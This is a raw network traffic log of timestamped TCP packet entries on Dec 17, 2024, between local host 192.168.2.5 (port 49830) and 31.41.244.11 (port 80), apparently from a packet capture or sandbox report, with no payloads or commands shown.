Dec 17, 2024 06:03:10.941041946 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.942071915 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.942142963 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.942164898 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.942209959 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.943262100 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.943331957 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.943367004 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.943418980 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.947865009 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.947877884 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.947889090 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.947900057 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.947936058 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.947969913 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.948565960 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.948618889 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.948749065 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.948802948 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.949839115 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.949852943 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.949899912 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.949915886 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.950864077 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.950921059 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.951039076 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.951086998 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.952085018 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.952136040 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.952258110 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.952351093 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.952625036 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.952637911 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.952682972 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.952773094 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.952831030 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.952905893 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.952964067 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.954019070 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.954052925 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.954071045 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.954108953 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.955193996 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.955257893 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.955291033 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.955331087 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.959758997 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.959825993 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.960431099 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.960450888 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.960460901 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.960472107 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.960480928 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.960514069 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.960587978 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.960645914 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.961838961 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.961854935 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.961896896 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.961920977 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.962932110 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.962944031 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.962990999 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.964145899 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.964211941 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.964301109 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.964360952 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.965107918 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.965178013 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.965429068 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.965487957 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.966510057 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.966568947 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.966676950 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.966739893 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.967647076 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.967658997 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.967710018 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.968851089 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.968913078 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.969042063 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.969100952 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.969991922 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.970037937 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.970166922 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.970225096 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.971169949 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.971227884 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.971343994 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.971399069 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.972420931 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.972491980 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.972600937 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.972656965 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.973568916 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.973614931 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.973740101 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.973793983 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.974201918 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.974214077 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.974260092 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.974262953 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.974304914 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.974354982 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.974409103 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.975476027 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.975523949 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.975562096 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.975615978 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.976653099 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.976715088 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.976761103 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.976818085 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.977850914 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.977910042 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.977955103 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.978004932 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.982523918 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.982536077 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.982547045 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.982557058 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.982589006 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.982623100 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.983067036 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.983148098 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.983249903 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.983304024 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.984509945 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.984519958 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.984563112 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.985656977 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.985667944 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.985719919 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.986788988 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.986846924 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.986969948 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.987032890 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.987277985 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.987288952 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.987344027 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.987405062 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.987462044 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.987497091 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.987544060 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.988742113 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.988754034 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.988802910 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.989830971 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.989909887 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.989923000 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.989974022 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.990971088 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.991029024 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.991108894 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.991163969 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:10.992139101 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:10.992198944 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.121793032 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.121839046 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.121870041 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.121906996 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.122359037 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.122421980 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.122479916 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.122536898 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.123590946 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.123656034 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.123662949 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.123714924 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.124749899 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.124814034 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.124854088 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.124905109 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.125936031 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.126013994 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.126023054 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.126091957 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.127135038 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.127198935 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.127238035 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.127300024 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.128317118 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.128371000 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.128410101 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.128472090 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.129527092 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.129584074 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.129585981 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.129638910 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.130695105 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.130814075 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.130822897 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.130860090 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.131947041 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.132005930 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.132040977 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.132096052 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.133115053 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.133176088 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.133212090 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.133265972 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.134310007 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.134385109 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.134562016 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.134618998 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.135482073 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.135545969 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.135618925 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.135675907 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.136677027 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.136734962 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.136794090 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.136850119 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.137876987 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.137942076 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.137995958 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.138076067 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.139060020 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.139152050 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.139188051 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.139233112 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.140244961 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.140338898 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.140397072 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.140454054 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.141453981 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.141506910 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.141567945 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.141618013 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.142632961 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.142685890 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.142736912 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.142787933 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.143850088 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.143917084 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.144064903 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.144114017 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.145028114 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.145108938 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.145139933 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.145188093 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.146229029 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.146279097 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.146336079 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.146387100 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.147411108 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.147460938 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.147499084 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.147547960 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.148600101 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.148655891 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.148722887 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.148773909 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.149794102 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.149847031 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.149924040 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.149974108 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.151014090 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.151061058 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.151134014 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.151184082 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.152189970 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.152244091 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.152311087 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.152360916 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.153412104 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.153466940 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.153522968 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.153573036 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.154562950 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.154613972 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.154689074 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.154737949 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.155752897 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.155817986 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.155855894 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.155905962 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.156955957 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.157006979 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.157062054 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.157109976 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.158137083 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.158188105 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.158243895 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.158291101 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.159358978 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.159411907 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.159436941 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.159485102 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.160922050 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.160973072 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.161037922 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.161088943 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.161731005 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.161781073 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.161870956 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.161920071 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.162913084 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.162971020 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.163012028 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.163062096 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.164099932 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.164156914 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.164196014 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.164252043 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.165313005 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.165371895 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.165412903 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.165484905 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.166508913 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.166573048 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.166647911 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.166704893 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.167778015 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.167833090 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.167891979 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.167956114 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.168932915 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.168992996 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.169029951 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.169083118 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.170100927 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.170166016 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.170268059 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.170326948 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.171277046 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.171334028 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.171405077 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.171479940 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.172471046 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.172529936 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.172570944 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.172636032 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.173645020 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.173702002 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.173774958 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.173831940 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.174871922 CET	80	49830	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:11.174936056 CET	49830	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:11.174977064 CET	80	49830	31.41.244.11	192.168.2.5
